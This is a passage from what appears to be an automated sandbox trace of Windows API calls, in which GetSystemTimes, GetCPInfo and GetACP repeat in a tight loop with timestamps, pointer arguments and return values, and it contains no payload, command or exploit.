0x4e4 [0178.485] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.485] GetACP () returned 0x4e4 [0178.485] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.485] GetACP () returned 0x4e4 [0178.485] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.485] GetACP () returned 0x4e4 [0178.485] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.485] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.485] GetACP () returned 0x4e4 [0178.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.486] GetACP () returned 0x4e4 [0178.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.486] GetACP () returned 0x4e4 [0178.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.486] GetACP () returned 0x4e4 [0178.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.486] GetACP () returned 0x4e4 [0178.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.486] GetACP () returned 0x4e4 [0178.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.486] GetACP () returned 0x4e4 [0178.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.487] GetACP () returned 0x4e4 [0178.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.487] GetACP () returned 0x4e4 [0178.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.487] GetACP () returned 0x4e4 [0178.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.487] GetACP () returned 0x4e4 [0178.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.487] GetACP () returned 0x4e4 [0178.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.487] GetACP () returned 0x4e4 [0178.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.488] GetACP () returned 0x4e4 [0178.488] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.488] GetACP () returned 0x4e4 [0178.488] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.488] GetACP () returned 0x4e4 [0178.488] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.488] GetACP () returned 0x4e4 [0178.488] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.488] GetACP () returned 0x4e4 [0178.488] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.488] GetACP () returned 0x4e4 [0178.488] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.489] GetACP () returned 0x4e4 [0178.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.489] GetACP () returned 0x4e4 [0178.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.489] GetACP () returned 0x4e4 [0178.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.489] GetACP () returned 0x4e4 [0178.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.489] GetACP () returned 0x4e4 [0178.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.489] GetACP () returned 0x4e4 [0178.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.490] GetACP () returned 0x4e4 [0178.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.490] GetACP () returned 0x4e4 [0178.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.490] GetACP () returned 0x4e4 [0178.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.490] GetACP () returned 0x4e4 [0178.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.490] GetACP () returned 0x4e4 [0178.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.490] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.490] GetACP () returned 0x4e4 [0178.490] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.491] GetACP () returned 0x4e4 [0178.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.491] GetACP () returned 0x4e4 [0178.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.491] GetACP () returned 0x4e4 [0178.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.491] GetACP () returned 0x4e4 [0178.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.491] GetACP () returned 0x4e4 [0178.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.491] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.491] GetACP () returned 0x4e4 [0178.491] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.492] GetACP () returned 0x4e4 [0178.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.492] GetACP () returned 0x4e4 [0178.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.492] GetACP () returned 0x4e4 [0178.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.492] GetACP () returned 0x4e4 [0178.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.492] GetACP () returned 0x4e4 [0178.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.492] GetACP () returned 0x4e4 [0178.492] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.492] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.493] GetACP () returned 0x4e4 [0178.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.493] GetACP () returned 0x4e4 [0178.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.493] GetACP () returned 0x4e4 [0178.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.493] GetACP () returned 0x4e4 [0178.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.493] GetACP () returned 0x4e4 [0178.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.493] GetACP () returned 0x4e4 [0178.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.493] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.493] GetACP () returned 0x4e4 [0178.493] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.494] GetACP () returned 0x4e4 [0178.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.494] GetACP () returned 0x4e4 [0178.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.494] GetACP () returned 0x4e4 [0178.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.494] GetACP () returned 0x4e4 [0178.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.494] GetACP () returned 0x4e4 [0178.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.494] GetACP () returned 0x4e4 [0178.494] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.494] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.495] GetACP () returned 0x4e4 [0178.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.495] GetACP () returned 0x4e4 [0178.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.495] GetACP () returned 0x4e4 [0178.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.495] GetACP () returned 0x4e4 [0178.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.495] GetACP () returned 0x4e4 [0178.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.495] GetACP () returned 0x4e4 [0178.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.495] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.495] GetACP () returned 0x4e4 [0178.495] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.496] GetACP () returned 0x4e4 [0178.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.496] GetACP () returned 0x4e4 [0178.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.496] GetACP () returned 0x4e4 [0178.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.496] GetACP () returned 0x4e4 [0178.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.496] GetACP () returned 0x4e4 [0178.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.496] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.496] GetACP () returned 0x4e4 [0178.496] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.497] GetACP () returned 0x4e4 [0178.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.497] GetACP () returned 0x4e4 [0178.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.497] GetACP () returned 0x4e4 [0178.497] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: 